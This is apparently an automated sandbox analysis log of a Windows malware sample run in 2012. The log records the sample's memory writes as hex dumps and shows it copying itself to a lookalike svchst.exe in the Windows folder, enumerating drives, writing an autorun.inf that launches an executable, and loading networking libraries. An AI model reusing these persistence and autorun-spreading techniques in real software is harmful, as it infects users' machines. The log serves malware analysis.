Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 4096 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 540564737
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: * success or wait 540569077
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown success or wait 540569246
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown no more files 540569389
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 426000 Length: 73216 Value: 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 540621325
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown no more files 540622487
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 438000 Length: 1024 Value: 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 540640464
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown no more files 540641206
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown no more files 540642226
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 7FFDC008 Length: 4 Value: 00 00 40 00 success or wait 540651776
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown no more files 540653740
Thread context set TID: 1520 PID: 1764 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 0 EFLAGS: 0 Imagepath: null success or wait 540667063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: * success or wait 540669130
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown success or wait 540669297
Thread resumed TID: 1520 PID: 1764 Path: C:\vm_tricks_sample.exe success or wait 540670250
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: * success or wait 540699037
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown success or wait 540699482
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown no more files 540699623
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown no more files 540704323
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: * success or wait 540708944
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: unknown success or wait 540709385
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 540734136
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 540736436
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: * success or wait 540742287
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540742798
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: * success or wait 540753511
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown success or wait 540753941
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown no more files 540754306
Process terminated PID: 484 Path: C:\vm_tricks_sample.exe success or wait 551465557
General
Start time: 09:39:50
Start date: 24/01/2012
Path: C:\vm_tricks_sample.exe
Wow64 process (32bit): false
Commandline: C:\vm_tricks_sample.exe
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\vm_tricks_sample.exe read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 429EC0 CopyFileA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\svchst.exe read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file success or wait 1 429EC0 CopyFileA
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol
File Path Disposition File Mask Completion Count Source Address Symbol
C:\WINDOWS BothDirectoryInformation svchst.exe no such file 1 407930 FindFirstFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\shell32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 880000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 890000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 890000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 890000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 890000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 890000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\vm_tricks_sample.exe query and write and read and execute and extend size commit 8B0000 196608 own pid readonly success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 4146F4
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 4146F4
\KnownDlls\ssleay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libeay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libssl32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420

Registry Activities

Key Path Name Completion Count Source Address Symbol

Process Activities

PID Path Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe success or wait 1 404327 ExitProcess

Memory Activities

PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 147000 12F848 page read and write success or wait 1 401A60 LocalAlloc
1764 C:\vm_tricks_sample.exe 960000 12FA74 page no access success or wait 1 401554 VirtualAlloc
1764 C:\vm_tricks_sample.exe 960000 12FA64 page read and write success or wait 1 401726 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 1000 page read and write page read and write success or wait 2 437D1F VirtualProtect
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:51 0 2 0
09:39:52 0 2 0

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 541777619
Memory attributes changed PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 541777946
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 147000 Length: 12F848 Allocation Type: unknown Protection: page read and write success or wait 541786373
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 960000 Length: 12FA74 Allocation Type: unknown Protection: page no access success or wait 541787147
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 960000 Length: 12FA64 Allocation Type: unknown Protection: page read and write success or wait 541787392
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 541793785
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 541806667
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 541845625
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 541914105
Section loaded Path: \KnownDlls\ssleay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542309955
Section loaded Path: \KnownDlls\libeay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542340440
Section loaded Path: \KnownDlls\libssl32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542357169
Directory Information Queried Path: C:\WINDOWS Disposition: BothDirectoryInformation Filemask: svchst.exe no such file 542381499
File opened Path: C:\vm_tricks_sample.exe Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 542382847
File created Path: C:\WINDOWS\svchst.exe Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 542384456
Process terminated PID: 1764 Path: C:\vm_tricks_sample.exe success or wait 550202202
General
Start time: 09:39:51
Start date: 24/01/2012
Path: C:\WINDOWS\svchst.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
z: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
x: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
w: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
v: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
u: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
t: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
s: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
r: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
p: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
o: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
n: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
m: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
l: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
k: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
j: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
i: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
h: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
g: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
f: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
e: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
G: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
H: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
I: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
J: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
K: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
L: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
M: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
N: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
O: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
P: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
R: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
S: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
T: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
U: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
V: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
W: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
X: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Z: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
c:\autorun.inf read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 415700 CopyFileA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll read attributes and synchronize and generic write system synchronous io non alert and non directory file object name collision 1 413FC0 CreateFileA
c:\autorun.inf read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 41628E CreateFileA
D:\ read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file access denied 3 415700 CopyFileA
File Path Completion Count Source Address Symbol
C:\autorun.inf success or wait 1 4160A5 DeleteFileA
File Path Offset Length Value Completion Count Source Address Symbol
1508 unknown 67072 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 invalid handle 1 414018 WriteFile
C:\autorun.inf unknown 23 5b 61 75 74 6f 72 75 6e 5d 0d 0a 6f 70 65 6e 3d 5a 77 72 2e 65 78 65 success or wait 1 4162D6 WriteFile
File Path Offset Length Completion Count Source Address Symbol
File Path Disposition File Mask Completion Count Source Address Symbol
C:\WINDOWS\Temp BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\WINDOWS\Web BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
